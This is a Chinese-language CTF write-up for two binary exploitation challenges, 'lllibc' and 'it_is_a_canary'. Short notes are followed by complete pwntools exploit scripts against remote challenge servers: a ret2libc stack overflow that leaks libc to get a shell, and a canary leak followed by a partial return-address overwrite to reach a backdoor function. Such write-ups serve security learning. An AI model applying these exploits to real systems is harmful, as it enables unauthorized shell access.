lllibc

栈溢出

无 binsh 字符

直接 write ret2libc 即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
from pwn import * #引用pwntools库
from LibcSearcher import *
misaki=1
if misaki:
context(log_level='debug',arch='amd64',os='linux')
else:
context(log_level='debug',arch='i386',os='linux')
ming=1
if ming:
p=remote('27.25.151.26',43658)#配置远程连接27.25.151.26 61634
else:
p=process("./lllibc")#配置本地连接:

def s(a):#发送
p.send(a)
def sl(a):#带\n发送
p.sendline(a)
def sa(a,b):#直到接收到a后发送b
p.sendafter(a,b)
def sla(a,b):#直到接收到a后发送b带\n
p.sendlineafter(a,b)
def r():#接收
p.recv()
def rl(a):#等待到接收到a
return p.recvuntil(a)
def m():#调用gdb
gdb.attach(p)

###############################################
len=0X10+0x08
ret=0x000000000040101a
pop_rsi=0x0000000000401180
pop_rdi=0x000000000040117e
pop_rdx=0x0000000000401182
elf=ELF("./lllibc")
libc=ELF("libc6_2.35-0ubuntu3.8_amd64.so")
payload=b'a'*len+ p64(pop_rdi) +p64(1)+p64(pop_rsi) +p64(elf.got['write'])+p64(elf.plt['write']) + p64(0x4011EC)
sa(b'Libc how to win?\n',payload)
write_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print(f'write_addr=',hex(write_addr))


libc_base = write_addr - libc.sym['write']
sys_addr = libc_base + libc.sym['system']
bin_sh = libc_base + next(libc.search(b"/bin/sh\x00"))
payload=b'a'*len+ p64(ret)+ p64(pop_rdi) +p64(bin_sh)+p64(sys_addr)
sa(b'Libc how to win?\n',payload)

p.interactive()#与程序交互

it_is_a_canary

有 canary 和 pie 保护

canary 可以直接通过此处泄露出来

有完整后面,pie 没想到泄露偏移值的方法,但是有直接的后门函数,修改 返回地址低四位为 win 函数的地址,1/16 的概率打通

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
from pwn import * #引用pwntools库
from LibcSearcher import *
misaki=1
if misaki:
context(log_level='debug',arch='amd64',os='linux')
else:
context(log_level='debug',arch='i386',os='linux')
ming=1
if ming:
p=remote('27.25.151.26',38720)#配置远程连接27.25.151.26:4964
else:
p=process("./it_is_a_canary")#配置本地连接:

def s(a):#发送
p.send(a)
def sl(a):#带\n发送
p.sendline(a)
def sa(a,b):#直到接收到a后发送b
p.sendafter(a,b)
def sla(a,b):#直到接收到a后发送b带\n
p.sendlineafter(a,b)
def r():#接收
p.recv()
def rl(a):#等待到接收到a
return p.recvuntil(a)
def m():#调用gdb
gdb.attach(p)
#
###############################################
len=0X20
payload=b'a'*(len-8)+b'b'

sa(b'Is it a canary?\n',payload)
rl(b'ab')

canary1=u64(p.recv(8))
rbp=u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
canary_base=(canary1 >>56)<<56
canary2=(canary1-canary_base)<<8
rbp=rbp<<8
canary1=canary1 >>56
rbp+=canary1
rbp_0x18=rbp+0x18
print(f'dac=',hex(canary1))
print(f'canary=',hex(canary2))
print(f'rbp=',hex(rbp))
payload2=b'a'*(len-8)+p64(canary2)+p64(1)+p16(0xa265)
#m()
sa(b'.',payload2)
#pause()
p.interactive()#与程序交互